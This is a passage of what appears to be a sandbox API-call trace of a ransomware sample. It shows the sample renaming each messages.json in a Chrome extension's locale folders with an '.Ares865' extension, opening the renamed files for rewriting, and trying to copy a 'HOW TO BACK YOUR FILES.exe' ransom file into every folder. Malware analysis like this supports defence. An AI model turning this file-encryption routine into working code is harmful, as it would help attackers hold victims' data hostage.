lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.403] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.403] lstrlenW (lpString="messages.json") returned 13 [0102.403] lstrlenW (lpString="Ares865") returned 7 [0102.403] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.403] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.Ares865") returned 160 [0102.403] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.404] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.405] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=220) returned 1 [0102.407] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et" [0102.408] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et" [0102.408] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.408] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.408] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.409] GetLastError () returned 0x0 [0102.409] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.409] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84140710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ea5c880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ea5c880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.409] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.409] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.409] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.409] lstrlenW (lpString="messages.json") returned 13 [0102.409] lstrlenW (lpString="Ares865") returned 7 [0102.409] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.409] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.Ares865") returned 160 [0102.409] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.411] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.411] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=226) returned 1 [0102.414] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419" [0102.414] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419" [0102.414] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.414] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.415] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.415] GetLastError () returned 0x0 [0102.416] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.416] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x841391e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ea5c880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ea5c880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.416] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.416] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.416] lstrcpyW (in: lpString1=0x2cce51e, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.416] lstrlenW (lpString="messages.json") returned 13 [0102.416] lstrlenW (lpString="Ares865") returned 7 [0102.416] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.416] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.Ares865") returned 164 [0102.416] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.418] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es_419\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.418] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=229) returned 1 [0102.421] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es" [0102.421] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es" [0102.421] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.421] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.422] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.422] GetLastError () returned 0x0 [0102.422] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.422] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84131cb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ea5c880, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ea5c880, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.422] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.423] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.423] lstrcpyW (in: lpString1=0x2cce516, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.423] lstrlenW (lpString="messages.json") returned 13 [0102.423] lstrlenW (lpString="Ares865") returned 7 [0102.423] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.423] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.Ares865") returned 160 [0102.423] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.424] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\es\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.425] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=229) returned 1 [0102.428] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US" [0102.428] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US" [0102.428] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.428] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.429] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.429] GetLastError () returned 0x0 [0102.429] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.429] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8412a780, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ea829e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ea829e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.429] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.430] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.430] lstrcpyW (in: lpString1=0x2cce51c, lpString2="messages.json" | out: lpString1="messages.json") returned="messages.json" [0102.430] lstrlenW (lpString="messages.json") returned 13 [0102.430] lstrlenW (lpString="Ares865") returned 7 [0102.430] lstrcmpiW (lpString1="es.json", lpString2="Ares865") returned 1 [0102.430] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json.Ares865") returned 163 [0102.430] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.431] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_US\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_us\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.432] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=213) returned 1 [0102.435] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB" [0102.435] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB" [0102.435] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.435] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.435] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.436] GetLastError () returned 0x0 [0102.436] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.436] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8411bd20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ea829e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ea829e0, 